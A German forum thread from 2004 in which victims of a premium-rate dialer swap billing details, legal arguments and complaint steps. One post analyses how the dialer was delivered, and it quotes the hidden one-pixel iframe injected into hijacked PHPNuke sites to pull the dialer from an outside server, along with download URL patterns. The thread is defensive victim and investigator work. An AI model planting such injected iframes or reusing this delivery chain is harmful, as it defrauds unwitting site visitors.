Da wird es schnell teurer sich zu wehren, als die Rechnung eigentlich kostet.

MfG
L.


----------



## mischm (6 Mai 2004)

Rechercheergebnisse die hier vielleicht interessant sind:
ein Freund hat sich leider einen Dialer eingefangen,
bzw es wurde ein zusätzlicher DFÜ Verbindung aufgebaut zur 
Tel Nr: 0900-90000928
über :
http://www.regtp.de/mwdgesetz/start/fs_12.html
lässt sich dazu der Anbieter herausfinden:
---------------------------------------------------------------------
0900 - 90000928
Diensteanbieter:
microjuris.com
Inc.null
North Dupont Hwy. 435
19903 Dover, DE
VEREINIGTE STAATEN VON AMERIKA

Datum der Zuteilung der Rufnummer:
Fri Jan 16 10:32:10 UTC+0100 2004
=================================

da im neuen Misbrauchsgesetzinfos:
http://www.regtp.de/mwdgesetz/start/fs_12.html

gilt:
Wenn Sie vor Beginn der Inanspruchnahme der Dienstleistung über
(0)190er/(0)900er Rufnummern nicht in der vom Gesetz vorgeschriebenen
Weise (s. o.) über den Preis informiert wurden, besteht kein Anspruch
auf Zahlung des Entgeltes. Dies hat der Gesetzgeber ausdrücklich im §
43b, Abs. 2 Satz 6 bestimmt.

Auch in :
http://www.spiegel.de/netzwelt/politik/0,1518,297628,00.html
wird das aktuell aufgegriffen:
"Dabei sollte eigentlich alles besser werden: Im vergangenen August
verschärfte der Gesetzgeber die Registrierungs-Voraussetzungen für
Dialer. Demnach müssen die Anbieter mittlerweile nachweisen, dass
jedes Programm eindeutig erkennbar ist. Der Nutzer muss dann dem
Runterladen der Datei, der Installation des Dialers auf dem eigenen
Rechner sowie dem Verbindungsaufbau einzeln zustimmen."

Eine solche Information hat im fraglichen Fall nicht stattgefunden so
dass hier der Tatbestand des Betruges wohl erfüllt ist.

0900-9x Nummer kosten laut Liste 1,237 EUR/min,
da der Betrügerische Dialer nach knapp 2 min bemerkt wurde,
düfte der Schaden gering sein. Wenn allerdings horrende
Einwahlgebühren dazu noch anfallen sollten, wäre das leider nicht mehr
der Fall.

Wie ist denn da das sinnvolle weitere Vorgehen?
Im T-Punkt, dem Service Point unseres glorreichen größten
Telekommunikationsanbieters ist man jedenfalls nicht angesagt, Service
gibt es da nur beim Verkauf bzw Unterschreiben des Vertrages. Bei
Reklamationen auf solcherart windige Telefongeschäfte wird der Kunde
jedenfalls abgewimmelt.

Sinnvoll ist es, sich alle 0190, 0900, ect vom Festanschluss sperren
zu lassen damit man sich den Ärger garnicht erst einhandelt. Das war
in diesem Fall eigentlich der Fall, nur hatte das vor einiger Zeit
stattgefunden wo es noch keine 0900 Nummern gab und diese demzufolge
noch nicht gesperrt werden konnten. Derjenige, bei dem das ebenfalls
zutrifft sollte die 0900 Sperre ebenfalls nachzuholen. Für die
seltenen Gelegenheiten, dass man eine Servicehotline ect. braucht kann
man das immer noch über das Mobiltelefon erledigen.
----------------------
(neue info 5.5.2004):

Hier nähere Infos (siehe unten) zum Fall:
auf der Telefonrechnung erscheint eine Verbindung 1min 47sec für 3,07
EUR,
der ..... ist hier noch rechtzeitig bemerkt worden.

Bei der Schadenshöhe erübrigt sich eine zeitaufwendige Eskalation
unabhängig von der Reklamation bei der Telekom.
Aber ist das ist eventuell das Geschäftsprinzip:
Eine sehr große Anzahl Leute auf fragwürdigem Wege um einen kleinen
Betrag zu erleichtern lohnt sich in der Summe schon,
die Gefahr das das auffliegt ist relativ gering weil niemand für einen
so geringen Betrag viel Zeit investieren kann/will?

MS
-------
Der fragwürdige Seiten(/Dialer(?))anbieter ist laut telefonischer
Auskunft von BT (Germany) GmbH & Co. oHG (siehe unten)
ein:
......
Schloßbergstr. 37
55411 Bingen am Rhein

Auf der Telefonrechnung erscheint diese Firma:
http://www.btglobalservices.com/de/other/impressum.html
(info aus link):
BT (Germany) GmbH & Co. oHG
Barthstrasse 22
D-80339 München
Telefon: +49 89 2600-0
oder: 0800-2255722
Telefax: +49 89 2600-2477
E-Mail: [email protected]
Internet: www.btglobalservices.com/de
  Sitz und Registergericht:
München, HRA 77639
  Vertretungsberechtigte Gesellschafterin der oHG:
BT Deutschland GmbH, München HRB 132307
  Geschäftsführung:
......
  Umsatzsteuer-Identifikationsnummer gemäß § 27a UStG:
DE 813121512
  Lizenzierende Behörde nach §§ 6, 8, 71, 72 TKG:
Regulierungsbehörde für Telekommunikation und Post (RegTP) als
Bundesoberbehörde im Geschäftsbereich des Bundesministeriums für
Wirtschaft und Technologie
Tulpenfeld 4, 53113 Bonn
Telefon 0228/14-0
Fax 0228/14-88 72
www.regtp.de

_ persönliche Daten gelöscht, siehe Nutzungregeln
http://forum.computerbetrug.de/rules.php#9
tf/mod _


----------



## Anonymous (6 Mai 2004)

*Re: habe mir das ding auch eingefangen!*



			
				Fidul schrieb:
			
		

> gast schrieb:
> 
> 
> 
> ...


Realsatire aus Meschede?


			
				RegTP schrieb:
			
		

> Auszug aus der Amtsblatt-Verfügung 54/2003:
> "D. Ablauf des Verfahrens zur Registrierung        ...
> III. Anträge von Antragstellern mit einer Auslandsadresse, bei denen kein Empfangsbevollmächtigter
> mit einer ladungsfähigen Anschrift im Inland angegeben ist, werden
> nicht berücksichtigt. Der Antragsteller wird hierüber informiert."


 Es ist möglich, dass ein Antragsteller (also Inhaber der Rufnummer) seinen Sitz im Ausland hat und auch der Vertretungsberechtigte (Regel: Geschäftsführer) ebenfalls im Ausland sitzt. Andere Regelungen hätten meiner Meinung nach auch keinen Bestand vor europäischen Gerichten. Der o.g. Auszug bedeutet also, dass nur Anträge nicht berücksichtigt werden können, die nicht zugestellt werden können! 

Aha.


----------



## HenningHÖ (6 Mai 2004)

*????*

Ganz weit oben hatte ich ja eine these aufgestellt.

Ich versthe die Antwort allerdings nicht. Wieseo mach ich mich strafbar wenn ich uaf eine Seite mit unrechtmäßigen Dialer gehe, und  ohne mein zutun plötzlich ne 0900 nummer gewählt wird?
Wieso kann ich den Link nicht einfach nem Zuständigen Menschen (RegTP,Kripo) zuschicken und die unrechtmäßigkeit wird erkannt?
Ich will das Geld nicht überweisen!!! 
An die anderen Geschädigten: Wie ist denn bei euch der Stand der Dinge???


----------



## Reducal (6 Mai 2004)

Mir stieß Deine Erstformulierung etwas bitter auf. Das hatte sich so gelesen, als hättest Du jetzt einen Schaden, den Du mit einer späteren Session dokumentieren wolltest. Solange er mit offenen Karten spielt, macht sich ein Anzeigenerstatter selbstverständlich nicht strafbar.


----------



## HenningHÖ (7 Mai 2004)

Ne so war das nicht gemeient . Ich mach mir bewusst nochmal nen schaden und dokumentiere den dann. Oder nutze den link einfach als Ansatzpunkt.
Hat denn jemand ne Ahnung wo man sich diesen dialer einfangen kann?


----------



## Anonymous (7 Mai 2004)

*Betroffene von 0900 90000 928*

Hallo Betroffene nochmal,

sehr aufschlußreicher Link  für alle die, die nicht wissen wie es um sie  und die Telefonrechung geschah:

http://www.peterhuth.de
Thema:
Ein Dialer aus dem Nichts

So werden wir wahrscheinlich immer noch abegzockt.
Meiner Meinung hilft nur Widerspruch zum Betrag der Nummer auf der Telefonrechnung (andere Beträge unbedingt an die Telekom überweisen!!!) und auch an die BT ein Widerspruchsschreiben mit dem Vermerk dass nicht gezahlt wird. Desweitern eine Beschwerde an die Regtp. Vordruck kann man dort finden. Hilft die Sache zu beschleunigen, damit sie gesperrt wird.

Es wird überall geraten in gar keinem Falle zu zahlen, was ich auch nicht und niemals tun werde. Zur Not muß die Rechtsschutz herhalten, wenn es schlimm kommt....Es soll jedoch  kein Fall bekannt sein, trotz Mahnungen und Androhungen, der jemals in dieser Richtung vor dem Gericht tatsächlich gelandet ist. 

Also nur Mut und auf in den Dialerdschungel, die schwarzen Schafe suchen.


mfg
der wütende Internetuser, der mithilft diesem Treiben ein Ende zu machen


----------



## Tostan (10 Mai 2004)

Aka-Aka schrieb:
			
		

> Wie kommt man nun genau von der 090090000928 auf die 090090000606?


Da der eigendliche dialer (oft gamepad.exe) jedesmal neu aus dem Netz geladen wird, sind unterschiedliche Einwählnummern ja durchaus möglich.
Also normalerweise ist es bei dem Ding so: Aufbau der Verbindung über normalen Anbieter. Unbemerkter Download des dialers (und wie genau, das ist für mich noch das Problem), trennen der Verbindung und Neueinwahl über 09009*, Löschen der Explorer-History (zumindest bei mir).

Nach gründlicher suche auf einem befallenen Rechner fand sich auch noch ein SD.bot. Evtl. wurde ja darüber der dialer nachgeladen?

Tostan


----------



## neward (11 Mai 2004)

Hallo Leute,

als ersten möchte ich alle wirklich Interessierten und/oder Geschädigten bitten, sich nicht nur als "Gast" zu äußern, sondern sich auch zu registrieren. Das :
- kostet nichts,
- ist eine Sache von 3 Minuten
- und hat den großen Vorteil, dass man in einem so langen und unübersichtlichen Thread wie diesem die Leute zu spezifischen Fragen *direkt *per PN ansprechen kann.
- Außerdem verbieten die Regeln die Bekanntgabe von E-Mail-Adressen nur im Forum, nicht in den *P*ersönlichen *N*achrichten!

Zum Thema:

Zwar entspringt die ganze "Flut" diverser illegaler BT-Dialer scheinbar nur einer einzigen "Quelle" und insofern ist es durchaus sinnvoll, sie im Zusammenhang zu sehen. Juristisch stellt jedoch jeder einzelne Dialer - wenn ich das richtig verstanden habe - ein eigenes Problem dar.

Ich möchte daher einen eigenen Thread für die Nummer 0900/9000606 aufmachen, um möglichst viele Informationen über *den* Dialer zusammenzutragen, der für unter anderem *mich *relevant ist.

Nur bei möglichst vollständiger Dokumentation aller Eigenarten eines Dialers und Zusammentragen der entsprechenden Beweise und Zeugenaussagen lässt sich der lockere - und wichtige (!) - Informationsaustausch eines Forums zu einem gerichtsverwertbaren und damit wirklich schlagkräftigen Werkzeug aufkonzentrieren.

Ich habe vor, meine Vorgehensweise im Umgang mit meiner Rechnung (über ca. 100 Euro) sowie alle tatsächlichen wie juristischen Fakten dort vorgangsaktuell zu dokumentieren.

Näheres siehe: http://forum.computerbetrug.de/viewtopic.php?t=5408

Werner


----------



## Tostan (11 Mai 2004)

neward schrieb:
			
		

> Zwar entspringt die ganze "Flut" diverser illegaler BT-Dialer scheinbar nur einer einzigen "Quelle" und insofern ist es durchaus sinnvoll, sie im Zusammenhang zu sehen. Juristisch stellt jedoch jeder einzelne Dialer - wenn ich das richtig verstanden habe - ein eigenes Problem dar.
> 
> Ich möchte daher einen eigenen Thread für die Nummer 0900/9000606 aufmachen, um möglichst viele Informationen über *den* Dialer zusammenzutragen, der für unter anderem *mich *relevant ist.



Normalerweise stimmt wohl deine Aussage, aber bei diesem speziellen Dialer (gamepad.exe) ist es wohl so, dass der eine Dialer verschiedene Nummern anruft, so dass es wohl auch Juristisch dasselbe Problem ist. 

Falls du deinen PC nicht bereinigt, sondern lediglich einen Warner installiert hat, wirst du bemerken, dass diese gamepad.exe nicht mehr da ist, wenn man nach ihr sucht, die wird scheinbar ständig neu geladen, daher evtl. auch die vershciedenen Rufnummern. 

Was mich interessieren würde, was hast du genau auf dem PC gefunden, das heisst, wodurch wird diese gamepad.exe bei dir geladen, wo hast du dir evtl. den Dialer eingefangen (URL) Wird auch bei dir der Verlauf des Internet Explorers gelöscht?

Tostan


----------



## neward (12 Mai 2004)

> ... gamepad.exe ... wird scheinbar ständig neu geladen, daher ... die verschiedenen Rufnummern. 
> ... so dass es wohl auch juristisch dasselbe Problem ist. 

Ok, irgendwie einleuchtend !

> ... wodurch wird diese gamepad.exe bei dir geladen, wo hast du dir evtl. den Dialer eingefangen ...
> Wird auch bei dir der Verlauf des Internet Explorers gelöscht?

Den Prozess gamepad.exe habe ich mal kurz gesehen, aber wohl rechtzeitig genug abgewürgt, als dass er sich hat einwählen können.

Bei mir hieß der Bösewicht "d_2.exe". Dessen Auswirkungen habe ich erst mehr als 3 Wochen nach der Attacke bemerkt, nämlich auf der Telefonrechnung !  Und da erfasste der Verlauf die relevanten Daten schon nicht mehr. 

Da ich ihn, den Verlauf, aber fast nie benutze oder auch nur ansehe, mag es sein, dass er gelöscht wurde, ohne dass ich etwas davon mitbekommen habe. - Tut mir Leid.

Ich habe zwar einige ganz dunkle Vorstellungen, wo es evt. gewesen sein könnte, aber...
Ich melde mich, wenn ich wieder drüber stolpere.

neward


----------



## Anonymous (12 Mai 2004)

*Bei BT Widerspruch eingelegt, was kommt jetzt?*

Moin!
Ich habe am 23.4. eine Tel.Rechnung mit einer Forderung (ca. 30 EUR)
von der BT Germany erhalten. (wg. Einwahl 0900/90000928).
Nach einigen Tagen des Nachdenkens -und hier Mitlesens- habe ich
das Geld zurückgefordert, dann den regulären Telekom-Teil wieder überwiesen. 
An Telekom geschrieben und an BT, dass die Forderung durch einen
m.E. illegalen Dialer verursacht wurde und ich nicht zahlen will.
(Und Meldung an RegTP.)
Bis jetzt keine Antwort. Was passiert nun eigentlich? 

Grüße
BH


----------



## TSCoreNinja (12 Mai 2004)

*Dialertechnik*

Liebe Life & Art Geschaedigten,

inzwischen sind meine Nachforschungen von etwas Erfolg gekroent worden. Allerdings liefert der Downloadlink des Dialers, der heute morgen noch auf den Dialer weiterleitete, derzeit nur eine leere Seite. Ob die Verantwortlichen hellhoerig geworden sind, nachdem sie ihre Log Dateien gesichtet haben? 

*Herkunft des Dialers*
Der eigentliche Dialer stammt von einem Webserver, der unter etlichen alias Namen sowie mit mindestens zwei verschiedene IP Adressen betrieben wird (Load Balancing?) Dem Servernamen bin ich durch einen Hinweis im Forum von Teltarif in diesem Posting auf die Spur gekommen. Vorsicht, der dort gepostete Link ist scharf. Suche bei Google zeigt interessante Hits zu dieser Site. Die Datei enthaelt ein 
Visual Basic Script, in dem der Dialer codiert ist. 

*Typen und Funktionsweise*
http://$DOWNLOAD/download/dialer/dialers/d_1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d_2.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d2.exe.php?AID=XXX

Ich bin mir nicht sicher, welcher welcher ist, aber entpackt man den darin kodierten Dialer, gibts als einzige grafische Einwahlaufforderung den angehaengten Hinweis von 0900Warner. Nicht nett. Das duerfte selbst der RegTP nicht als Einwahldialog reichen. Gemein ist auch, dass ein Teil der Dialer dabei eine Weile  (etwa 1-2 Minuten) warten. Keiner der Dialer ist bei der RegTP zugelassen. 
Die Dialer erstellen dabei uebrigens interessanterweise eine Kopie von sich selbst unter C:\winnt\system32\shellext\w.exe, und fuehren diese mit Kommandozeilenparametern "-aid -inst" aus. Gleichzeitig gibt es eine del.bat, die beide Dateien und sich selbst loescht.

Dieses Script wird uebrigens erst nach Abfrage der Anbindung (Lan oder Modem) und des Browsers (Internet Exploerer Version >=4) ausgefuehrt, andernfalls landet man auf einer blanken HTML Seite. Die Odyssee beginnt dabei mit der URL

http://$DOWNLOAD/download/download.php?id=$NR&AID=$XXX

Allerdings endet gerade diese Kaskade derzeit immer auf einer leeren Seite, wo gestern/heute morgen nur die LAN Verbindungen landeten, da hat jemand an den Skripts gewurschtelt.

Als Variante des Dialers gibt es noch zwei Alternativen, die per Plugin "eu_cax.cab" geladen werden. Dieses ist im Wesentlichen ein Internet Explorer Plugin, welches eine  Datei von einer URL herunterlaedt und ausfuehrt. Diese Dialer sind ein Byte kuerzer als die vorigen Varianten, aber funktionieren beinahe genauso. Unterschiede ist der Name der Datei in ShellExt, der in diesem Fall d.exe heisst (Mensch, sind die einfallslos, wie soll man den von HFMs Dialer unterscheiden koennen).  Dabei besteht eher Aehnlichkeit zu dem ExDialer. 

Einziger Unterschied: Die Nummer hat sich mal wieder geaendert. Und zwar per 006905051 ins wunderschoene Atafu Atoll, Tokelau. Ich denke mal, ET will nach Hause Telefonieren. Weniger weit weg, und vermutlich weniger lukrativ ist der zweite Anruf, der geht nach Estland, 0037270220140. 

*Einsatz*
Ok, nun ist klar, was der Dialer macht, aber wo wird der Dialer eingesetzt? Und dies ist meines Erachtens ein Novum an Dreistigkeit. Bin beim Suchen nach der Download URL ueber einen Thread in einem Schweizer Webmasterforum gestolpert.  Per Exploit wird ein Webserver gehijackt, und in die index.html Seiten ein iframe eingebaut

```
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>
```
Der entsprechende Server ist derzeit scheinbar nicht mehr am Netz, aber der Link leitete wohl einstmals direkt auf die oben genannte Download URL. Suche nach dem String "forced-action.com" bei Google liefet immerhin  117 Hits. Scheinbar wird insbesondere ein Exploit in PHPNuke missbraucht. 

Nun ja, erst einmal genug fuer heute,

Gruesse,
TSCoreNinja

PS: alle hier gemachten Aussagen koennen gerne gegenueber den Geld eintreibenden Institutionen zitiert werden. Weitere Details koennen per PN angefragt werden. Ansonsten werde ich das Ganze mal ordentlich dokumentiert der RegTP zutragen.

[edit 22:37] Link zum Schweizer Forum berichtigt[/edit]


----------



## Aka-Aka (12 Mai 2004)

Hochachtung!
cj


----------



## Counselor (12 Mai 2004)

*Re: Dialertechnik*



			
				TSCoreNinja schrieb:
			
		

> Per Exploit wird ein Webserver gehijackt, und in die index.html Seiten ein iframe eingebaut
> 
> 
> 
> ...



Die PHP Forensoftware ist schon öfters durch Schwächen in der Validierung bzw. Bereinigung der Nutzereingaben aufgefallen. Neuester Hammer:
http://www.securityfocus.com/bid/10306


----------



## Anonymous (13 Mai 2004)

http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_20.shtml

darum geht es und nur darum.

hier wird über eine hilfedatei "38ble.chm" weiteres nachgeladen und die sicherheitseinstellungen im IE bewirken nichts mehr. Für den IE ist eine solche Hilfedatei sicher, dabei wird böses damit gemacht.


----------



## harz1961 (13 Mai 2004)

*0900...928*

zu dailer1.exe und Variationen

Hallo zusammen. Habe mir am 12.04. eben diesen dailer eingefangen. Wie bei allen anderen "Opfern" ohne Bestätigung etc. Gehöre zur aussterbenden Spezies der Analogtelefonierer. Zwei Einwahlen am 12. und am 13. April konnte ich kurzfristig abbrechen, der Schaden blieb mit insgesamt nicht mal 3 Euro zum Glück gering. (BT(Germany), Barthstraße ...)
Ärgerlich folgendes. Mein Modem steht grundsätzlich auf Lautsprecher ein. Der dailer schaltet jedoch den Lspr aus, ein neuer Verbindungsaufbau verursacht lediglich ein leises Klicken durch ein abfallendes Relais auf der Modemkarte. Nur durch Neuinstallation zu beheben
Totalentfernung war zunächst nicht möglich, der dailer taucht immer wieder auf, ist allerdings nicht zu lokalisieren. 
Ich habe XP als Betriebssystem oft verdammt, hier hat allerdings die Systemwiederherstellung geholfen. Wiederherstellungszeitpunkt auf einen Termin vor dem dailerbefall gesetzt und der Spuk war vorbei.
Kontaktaufnahme mit Polizei: Habe bei einer DV-Gruppe (bearbeitet u.a. Computerkriminalität) der Polizei nachgefragt. Strafverfolgung benötigt Spurensicherung auf dem Rechner, Bearbeitungszeit durch Überlastung bis zu mehreren Wochen. Habe deshalb auf Anzeige verzichtet.
Kontakt mit Telekom: Über 0800 ServiceNummer. Mitarbeiter sagt zu, Abbuchung des entsprechenden Anbieters wird gestoppt, Ansprüche werden geprüft, meinen Anschluß habe ich für 0190 und 0900 blocken lassen.

Vielleicht kann ich mit diesem Beitrag niemanden helfen, aber ich muß mir den Frust mal von der Seele schreiben.


----------



## Aka-Aka (13 Mai 2004)

*Re: 0900...928*



			
				harz1961 schrieb:
			
		

> Strafverfolgung benötigt Spurensicherung auf dem Rechner, Bearbeitungszeit durch Überlastung bis zu mehreren Wochen. *Habe deshalb auf Anzeige verzichtet*.



 :evil: 

Dann sollen sie doch wenigstens notieren, dass ein weiterer Fall mit diesem Dialer vorliegt und zumindest eine Diskette oder CD mit den wenigen Hinweisen aufheben, die es gibt. Aber mal wieder: keine Anzeige, dideldideldüüü, und Rumpelstilzchen hüpft vor Freude und trinkt ein Schlückchen auf seine Zunft und ihre exekutionsunfähigen exekutiven Organe

cj


----------



## harz1961 (13 Mai 2004)

*Re: 0900...928*



			
				Aka-Aka schrieb:
			
		

> harz1961 schrieb:
> 
> 
> 
> ...



Sorry, hätte die Details dazuschreiben sollen: mit Wiederherstellung und fast 3 Wochen Betrieb bis Rechnungseingang waren da keine Spuren mehr. Ansonsten arbeiten die Jungs ganz ausgezeichnet. Werden aber mit Kinderpornografie und ähnlichen Ermittlungen erschlagen.


----------



## Antidialer (13 Mai 2004)

*Re: 0900...928*



			
				Aka-Aka schrieb:
			
		

> Dann sollen sie doch wenigstens notieren, dass ein weiterer Fall mit diesem Dialer vorliegt und zumindest eine Diskette oder CD mit den wenigen Hinweisen aufheben, die es gibt. Aber mal wieder: keine Anzeige, dideldideldüüü, und Rumpelstilzchen hüpft vor Freude und trinkt ein Schlückchen auf seine Zunft und ihre exekutionsunfähigen exekutiven Organe
> 
> cj



Ist doch leider eh immer so, egal ob Strafanzeige erstattet wurde oder nicht. Meist werden die Verfahren von der Staatsanwaltschaft eingestellt, weil angeblich kein genügendes öffentliches Interesse an der Strafverfolgung existiert oder weil die Verantwortlichen im Ausland (auch im europäischem) leben. Nur in den seltensten Fällen (Interfun) kommt es tatsächlich mal zu Aktionen. Ansonsten zeigt die Staatsanwaltschaft nur sehr wenig Interesse an der Verfolgung von Dialerbetrug. Das sieht man auch daran, das die HFM und Co schon seid einem halben Jahr ihr Unwesen treiben können, ohne das irgendetwas von staatlicher Seite dagegen unternommen wird. Das lässt sich auch nicht mit Arbeitsbelastung oder "so etwas braucht Zeit" wegdiskutieren, wenn man daran denkt, wie schnell die nötigen Schritte gegen den Sasser Schreiber unternommen wurden, sieht man, das es auch anders gehen kann.


----------



## Counselor (13 Mai 2004)

Anonymous schrieb:
			
		

> http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_20.shtml
> darum geht es und nur darum.


Irrtum! Hier kommen zwei Sicherheitslücken zusammen:
1) SQL Injection in ein unsicheres NukePHP Skript
2) Sicherheitslücke im IE, für die es seit 13.4.2004 ein Patch gibt

Ziff. 1: Skripte, die aus Usereingaben die Zeichen 
	
	



```
<(.|\n)+?>
```
 nicht in ungefährlichen Code umwandeln, sind einfach grottenschlecht. Leider kann der Besucher der Webseite nichts dagegen tun.
Ziff. 2: CHM Exploits sind ebenso grottenschlecht, aber der User kann das Patch anwenden.


----------



## Tostan (14 Mai 2004)

Counselor schrieb:
			
		

> Ziff. 1: Skripte, die aus Usereingaben die Zeichen
> 
> 
> 
> ...



gibts eigendlich ein Programm, das PHP-Code auf solche Lücken abcheckt? (z.B. so ähnlich, wie es tools gibt, die C-Code auf potentielle Buffer Overflows testen?) klar, das hilft den Besuchern einer Webseite wenig, aber evtl. können Webmaster sich davor schützen potentiell unsichere Scripte laufen zu lassen. (Irgendwie hab ich das Gefühl, nirgendwo ist die Spanne zwischen sehr guten und grottenschlechten Programmierern grösser als bei php)


----------



## KlausPeter (15 Mai 2004)

Tja mich hats auch mit erwischt: 150 EUR netto. Fernmündliches Nachfragen bei der BT (Germany) ergab das es die Nummer 0900 9 0000 928 war und das Androhen eines Mahnverfahrens, falls ich nicht zahlen würde.

Als Betreiber wurde eine Frau D. S.... mit Postfach in Bingen genannt, an der solle ich mich wenden, wenn ich ein Problem hätte.

Die einzelnen Verbindung waren:
11.04.: 14:02 min = 24,20 EUR
11.04.: 03:10 min =  5,46 EUR
13.04.: 14:04 min = 24,25 EUR
13.04.: 14:04 min = 24,25 EUR
13.04.: 14:07 min = 24,34 EUR
18.04.: 14:11 min = 24,45 EUR
19.04.: 14:15 min = 24,57 EUR

komisch oder? immer 14 Minuten (bis auf eine Ausnahme)

Ich verwende eine DSL-Flatrate, leider ist meine ISDN-Karte mit dem Telefonanschluß verbunden. Von den Dialer selbst habe ich nichts mitbekommen und deswegen auch keine Beweise oder soetwas gesichert.

In den betreffenden Zeitraum hatte ich aber vermutlich so eine Art Trojaner (ja ich bin ein Noob) auf meinem PC. Nachzulesen bei: 
http://www.trojaner-board.de/forum/ultimatebb.php?ubb=get_topic;f=6;t=005163;p=1

Jetzt glaube ich an einen Zusammenhang, hat irgendwer Ideen?
Auch der oben genannte Heise-Beitrag mit der Notepad.exe ist interessant da ich ja komischerweise eine Notepad.exe.bak auf meiner Platte gefunden habe.

Mit der Telekom habe ich schon gesprochen. Die Telefonistinnen waren sehr mitfühlend und wollen mir einen Einzelverbindungsnachweis mit vollständiger Nummer senden. Vermutlich wird es aber die besagte -928 sein.

Der RegTP habe ich schon mal eine Email mit dem Sachverhalt geschickt und Montags geht es zur Bank, Rückbuchung des Betrags und Bezahlen des unstrittigen Betrags unter dem Vermerk, daß BT nicht bezahlt wird.
Und die Rechtschutz ist auch schon rausgekramt. Mal zurücklehen und sehen was passiert.

Der Herr von BT (Germany) meinte ja, wir würden uns dann sehen...
(hoffentlich vor Gericht und nicht Russisch Inkasso? 

Gruß

Klaus

*[Virenscanner: Namen gekürzt]*


----------



## virenscanner (15 Mai 2004)

> O4 - HKCU\..\Run: [od-teen175] c:\programme\Webdialer\od-teen175.exe -m
> O4 - HKCU\..\Run: [od-teen108] c:\programme\Webdialer\od-teen108.exe -m


Ob eventuell diese beiden Dialer, die Du hattest, die "Ursache" sind?


----------



## technofreak (15 Mai 2004)

KlausPeter schrieb:
			
		

> Tja mich hats auch mit erwischt: 150 EUR netto. Fernmündliches Nachfragen bei der BT (Germany) ergab das es die Nummer 0900 9 0000 928 war und das Androhen eines Mahnverfahrens, falls ich nicht zahlen würde.
> Als Betreiber wurde eine Frau D. S.... mit Postfach in Bingen genannt, an der solle ich mich wenden, wenn ich ein Problem hätte.


mhh, für die genannte Nummer steht was anderes in der RegTP Datenbank (1 Datensatz gefunden) 

RegTP =90090000928


> Dateiname :  DIALER1.exe
> Dialer - Version : 1.2.1.54
> Inhalteanbieter : Brain Solutions, Inc


und auch für den Registrierungverpflichteten 


> microjuris.com, Inc.
> 435 North Dupont Hwy.
> Dover, DE 19903
> VEREINIGTE STAATEN VON AMERIKA


selbst der Vertretungsberechtigte  sitzt in  Übersee:


> Herr
> ....... (Name editiert )
> 435 North Dupont Hwy.
> Dover, DE 19903
> VEREINIGTE STAATEN VON AMERIKA


wie kassieren die hier eigentlich? 

tf


----------



## Anonymous (15 Mai 2004)

@tf:

blätter mal ein bisschen  zurück . Leider fehlt in diesem Thread ein sehr erhellendes posting


----------



## technofreak (15 Mai 2004)

Anonymous schrieb:
			
		

> Leider fehlt in diesem Thread ein sehr erhellendes posting



Denke schon ich weiß, was du meinst, nur fürchte ich, daß diese Infos (so interessant sie sind) 
den Betroffenen wenig akute  Hilfe bringen und sowohl Ermittlungs/Strafverfolgungsbehörden 
 wie Gerichte hoffnungslos überfordern würden.  Zivilrechtlich insbesonders und was die strafrechtliche Seite 
betrifft , sehe ich genau so wenig Handlungsspielraum der Behörden. 

Schließlich reicht der Arm des Gesetzes (auch in der EU )  nur bis zur deutschen Staatsgrenze
(von Verkehrsdelikten mal abgesehen...)  
und für ein  Auslieferungsbegehren  dürfte das wohl kaum reichen....

tf


----------



## KlausPeter (15 Mai 2004)

@virenscanner

möglich, kann man herausfinden welche Nummer die wählten?, die od-teen entdeckt aber antivir:
21.04.2004,06:54 Der AVGuard Dienst wurde erfolgreich gestartet!
21.04.2004,08:23 [WARNUNG]  Enthält Signatur eines kostenverursachenden Einwahlprogrammes DIAL/300483 (Dialer)!
  C:\WINDOWS\OD-TEEN216.EXE
      [INFO]  Die Datei wurde gelöscht!
21.04.2004,10:50 Stop Filter Device.
21.04.2004,10:50 Der AVGuard Dienst wurde beendet!

Leider habe ich keine Logs von den betreffenden Zeitraum, da sich meine Festplatte mit Antivir verabschiedet hat.

Was meint Ihr zu der Information, daß die Leute von Bingen zuständig (gleiche Postfach-Nummer) obwohl bei den RegTP abfragen keiner auftaucht?

Gruß

Klaus

P.S.: Da fällt mir ein, ich hatte mal den Od-Teen-Dialer, der war aber sichtbar und deswegen habe ich ihn gleich abgewürgt. Ist aber schon eine Zeit her und kann von mir nicht mehr ganz nachvollzogen werden


----------



## technofreak (15 Mai 2004)

KlausPeter schrieb:
			
		

> Was meint Ihr zu der Information, daß die Leute von Bingen zuständig
> (gleiche Postfach-Nummer) obwohl bei den RegTP abfragen keiner auftaucht?


Ich würde das Unternehmen mit dieser Tatsache (kann ja jederzeit vorgeführt und verifiziert werden,
 daß es keinerlei  Bezug zu Bingen in der RegTP Datenbank gibt) konfrontieren 

tf


----------



## Counselor (15 Mai 2004)

KlausPeter schrieb:
			
		

> Leider habe ich keine Logs von den betreffenden Zeitraum, da sich meine Festplatte mit Antivir verabschiedet hat.


Diese Software rettet Dateien auf beschädigten Datenträgern:
http://www.ontrack.de/kostenlosesoftware/


----------



## Anonymous (15 Mai 2004)

*gamepad.exe/lgc*

äh ich habe das schon mal geposted aber irgendwie falsch tut mir leid!
Also noch mal:

Ich habe auch diesen dialer gamepad.exe , beim suchen hab ich ne datei gefunden die da den namen hat gamepad.lgc , kann mir jem. sagen wofür diese *.lgc datei gut ist oder auch nicht gut ist.

die datei befindet sich unter C:\windows\applog ( win 98)
hier nochmal der klartext aus notpad im auszug 
o d105dd90 27a2 "C:\WINDOWS\WIN.INI"
R d105dd90 0 27a2
C d105dd90
o c173b910 35a00 "C:\PROGRA~1\0190WA~1\WHELPER.DLL"
R c173b910 2f000 1000
R c173b910 2f000 1000
R c173b910 30000 200
R c17265a0 89000 600
o c1727740 c0000 "C:\WINDOWS\SYSTEM\OLE32.DLL"
R c1727740 ad000 1000
R c1727740 b2000 1000
R c1727740 b1000 1000
R c17265a0 73000 1000
R c17265a0 8f000 1000
R c17265a0 10000 1000
R c17265a0 76000 1000
R c17265a0 7a000 1000
R c17265a0 8c000 1000
R c17265a0 8d000 1000
R c17265a0 8e000 1000
R c17265a0 75000 1000
R c17265a0 77000 1000
R c17265a0 8b000 1000
R c17265a0 78000 1000
R c17265a0 7b000 1000
R c17265a0 8a000 1000
R c17265a0 74000 1000
R c17265a0 39000 1000
R c17265a0 44000 1000
R c17265a0 d000 1000
R c17265a0 50000 1000
